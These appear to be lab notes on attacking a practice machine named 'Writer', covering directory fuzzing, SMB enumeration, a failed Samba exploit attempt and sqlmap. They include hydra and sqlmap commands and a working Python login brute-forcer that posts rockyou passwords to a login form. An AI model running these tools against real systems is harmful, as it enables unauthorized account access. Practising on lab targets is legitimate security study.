Machine - Writer
nmap:
ports 22, 80, 139 (smb), 445 (smb)
the web page seems pretty normal
fuzz
wfuzz -w /usr/share/dict/directory-list-2.3-medium.txt --hc 404 http://10.10.11.101/FUZZ
we find a few interesting URLs
000000269: 301 9 L 28 W 313 Ch "static"
000001225: 302 3 L 24 W 208 Ch "logout"
000002927: 302 3 L 24 W 208 Ch "dashboard"
000015237: 200 34 L 99 W 1443 Ch "administrative"
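Added example (my own code, not from these notes): a small parser for the wfuzz result lines above, to triage a longer run. It assumes the standard wfuzz text output format; the sample is the four hits pasted from above. Besides splitting by status code it groups hits that have the same line/word/char counts, which is the quickest way to spot that two paths (here logout and dashboard) are really the same redirect to the login page.

```python
import re
from collections import defaultdict

# One wfuzz result line: '<id>: <status> <lines> L <words> W <chars> Ch "<payload>"'
WFUZZ_LINE = re.compile(
    r'^\s*(?P<id>\d+):\s+(?P<code>\d+)\s+(?P<lines>\d+) L\s+(?P<words>\d+) W\s+'
    r'(?P<chars>\d+) Ch\s+"(?P<payload>[^"]*)"\s*$'
)

# Constructed sample: the four hits from the scan above, pasted verbatim.
SAMPLE = """\
000000269: 301 9 L 28 W 313 Ch "static"
000001225: 302 3 L 24 W 208 Ch "logout"
000002927: 302 3 L 24 W 208 Ch "dashboard"
000015237: 200 34 L 99 W 1443 Ch "administrative"
"""


def parse_wfuzz(text):
    """Return one dict per result line; banner, header and progress lines are skipped."""
    hits = []
    for line in text.splitlines():
        m = WFUZZ_LINE.match(line)
        if not m:
            continue
        hits.append({
            "payload": m["payload"],
            "code": int(m["code"]),
            "lines": int(m["lines"]),
            "words": int(m["words"]),
            "chars": int(m["chars"]),
        })
    return hits


def triage(hits):
    """Group hits by status code and flag responses that look identical."""
    by_code = defaultdict(list)
    for h in hits:
        by_code[h["code"]].append(h["payload"])
    # Same (code, lines, words, chars) for different payloads usually means the
    # same page came back, e.g. every authenticated path redirecting to one login
    # page. Those are candidates for --hh/--hw filtering on the next run.
    shape = defaultdict(list)
    for h in hits:
        shape[(h["code"], h["lines"], h["words"], h["chars"])].append(h["payload"])
    duplicates = {k: v for k, v in shape.items() if len(v) > 1}
    return dict(by_code), duplicates


def next_targets(hits):
    """Paths to open first: real content (200), then directories (301),
    then redirects (302), which are typically gated behind a login."""
    order = {200: 0, 301: 1, 302: 2}
    return [h["payload"] for h in sorted(hits, key=lambda h: order.get(h["code"], 9))]


if __name__ == "__main__":
    hits = parse_wfuzz(SAMPLE)
    by_code, dups = triage(hits)
    print("by status:", by_code)
    print("identical responses:", dups)
    print("visit in this order:", next_targets(hits))
```

Run it on a saved wfuzz log (`wfuzz ... > scan.txt`) by swapping SAMPLE for the file contents; the duplicate groups tell you which size to hide with --hh before a bigger wordlist.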
in administrative there is a login panel, but we have no credentials
Could try hydra with the user admin and rockyou; the form fields are uname/password and the panel answers "Incorrect" on a failed login, which goes in the last field as the failure string:
hydra -l admin -P /usr/share/dict/rockyou.txt 10.10.11.101 http-post-form "/administrative:uname=^USER^&password=^PASS^:Incorrect"
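Added example, not from the original notes: what hydra's http-post-form mode does, written out in Python against the same form, so the failure-string logic is visible. The field names uname/password and the "Incorrect" marker come from the hydra line above; that a successful login answers with a redirect is my assumption (hydra itself only checks that the failure string is absent, so a lockout page or a 500 would also count as a "hit" for it); the fake responder and its passwords are constructed for the demo.

```python
import sys
import urllib.error
import urllib.parse
import urllib.request

# Assumptions: same target, fields and failure marker as the hydra command.
TARGET = "http://10.10.11.101/administrative"
FAIL_MARKER = b"Incorrect"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx: we want to see the redirect itself, not the page behind it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # urllib then raises HTTPError carrying the 3xx status


def http_send(username, password, timeout=10):
    """Real transport: POST the login form, return (status, body)."""
    body = urllib.parse.urlencode({"uname": username, "password": password}).encode()
    req = urllib.request.Request(TARGET, data=body, method="POST")
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def classify(status, body):
    """Hydra's rule is just 'no failure string == success'; we split that further."""
    if FAIL_MARKER in body:
        return "fail"
    if status in (301, 302, 303):
        return "success"      # assumption: the app redirects after a good login
    return "ambiguous"        # no marker and no redirect: lockout, WAF, 5xx ...


def brute_force(username, passwords, send=http_send):
    """Try each password in order; stop at the first confirmed success.
    Returns (password_or_None, passwords_that_gave_an_ambiguous_answer)."""
    ambiguous = []
    for pw in passwords:
        status, body = send(username, pw)
        verdict = classify(status, body)
        if verdict == "success":
            return pw, ambiguous
        if verdict == "ambiguous":
            ambiguous.append(pw)  # hydra would report these as valid; check by hand
    return None, ambiguous


if __name__ == "__main__":
    wordlist = sys.argv[1] if len(sys.argv) > 1 else "/usr/share/dict/rockyou.txt"
    with open(wordlist, encoding="latin-1") as f:  # rockyou is not valid UTF-8
        found, unsure = brute_force("admin", (line.rstrip("\n") for line in f))
    print("found:", found, "ambiguous:", unsure[:10])
```

The "ambiguous" bucket is the caveat worth remembering when hydra reports a hit: confirm it with one manual login before spending time on it, and watch for the marker disappearing after N attempts (rate limiting), which would make every later password look valid.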
Try to enumerate SMB as well
> smbmap.py -H 10.10.11.101
[+] IP: 10.10.11.101:445    Name: 10.10.11.101
        Disk                Permissions    Comment
        ----                -----------    -------
        print$              NO ACCESS      Printer Drivers
        writer2_project     NO ACCESS
        IPC$                NO ACCESS      IPC Service (writer server (Samba, Ubuntu))
it is running Samba smbd 4.6.2
seems there is an exploit for it, EternalRed, in Metasploit
nothing… it needs a writable SMB share, and we have none
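Added example (not part of the notes): a check of the two preconditions for the EternalRed module, which is the Metasploit exploit for SambaCry, CVE-2017-7494 (my identification of what the note calls "eternal red"), against the smbmap listing above: a Samba build in the affected range, and a share we can write to. The smbmap text is the listing from above; the extra READ, WRITE share used in the test is constructed to show the positive case. The version boundaries are from the Samba advisory as I remember them (affected from 3.5.0, fixed in 4.4.14, 4.5.10 and 4.6.4); verify against the advisory before relying on them.

```python
import re

# smbmap prints one share per line: name, permission string, optional comment.
# (Share names containing spaces are not handled by this simple pattern.)
SHARE_LINE = re.compile(
    r'^\s*(?P<share>\S+)\s+(?P<perm>NO ACCESS|READ ONLY|READ, WRITE|WRITE ONLY)\s*(?P<comment>.*)$'
)

# The listing from above, pasted as smbmap prints it (tab separated).
SMBMAP_OUTPUT = """\
[+] IP: 10.10.11.101:445\tName: 10.10.11.101
\tDisk\tPermissions\tComment
\t----\t-----------\t-------
\tprint$\tNO ACCESS\tPrinter Drivers
\twriter2_project\tNO ACCESS\t
\tIPC$\tNO ACCESS\tIPC Service (writer server (Samba, Ubuntu))
"""


def parse_smbmap(text):
    """Return one dict per share; the [+] IP, header and separator lines do not match."""
    shares = []
    for line in text.splitlines():
        m = SHARE_LINE.match(line)
        if m:
            shares.append({"share": m["share"], "perm": m["perm"],
                           "comment": m["comment"].strip()})
    return shares


# CVE-2017-7494: every release from 3.5.0 onwards is affected until the fixed
# 4.4.14 / 4.5.10 / 4.6.4 (advisory values as I remember them; assumption).
FIXED_PATCH = {(4, 4): 14, (4, 5): 10, (4, 6): 4}


def samba_version_vulnerable(version):
    major, minor, patch = (int(x) for x in version.split(".")[:3])
    if (major, minor, patch) < (3, 5, 0):
        return False
    if (major, minor) in FIXED_PATCH:
        return patch < FIXED_PATCH[(major, minor)]
    # Older unsupported branches (3.5 .. 4.3) never got the fix; 4.7+ shipped with it.
    return (major, minor) < (4, 4)


def writable_shares(shares):
    return [s["share"] for s in shares if "WRITE" in s["perm"]]


def sambacry_feasible(version, smbmap_text):
    """True only if both preconditions hold: a vulnerable build AND a writable share.
    (The module additionally has to know, or guess, the share's path on disk.)"""
    writable = writable_shares(parse_smbmap(smbmap_text))
    return samba_version_vulnerable(version) and bool(writable), writable


if __name__ == "__main__":
    print("version vulnerable:", samba_version_vulnerable("4.6.2"))
    print("feasible, writable shares:", sambacry_feasible("4.6.2", SMBMAP_OUTPUT))
```

This is exactly why the module found nothing here: the build is in range, but with every share at NO ACCESS (no write, not even a guest login) there is nowhere to drop the shared object. Re-run the check with credentials later if any turn up, since share permissions are per user.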
let's try SQL injection
with Burp we save the login request to a file and hand it to sqlmap
sqlmap -r $(pwd)/request
Abandon! :(
Machine - Driver
Machine - Horizontall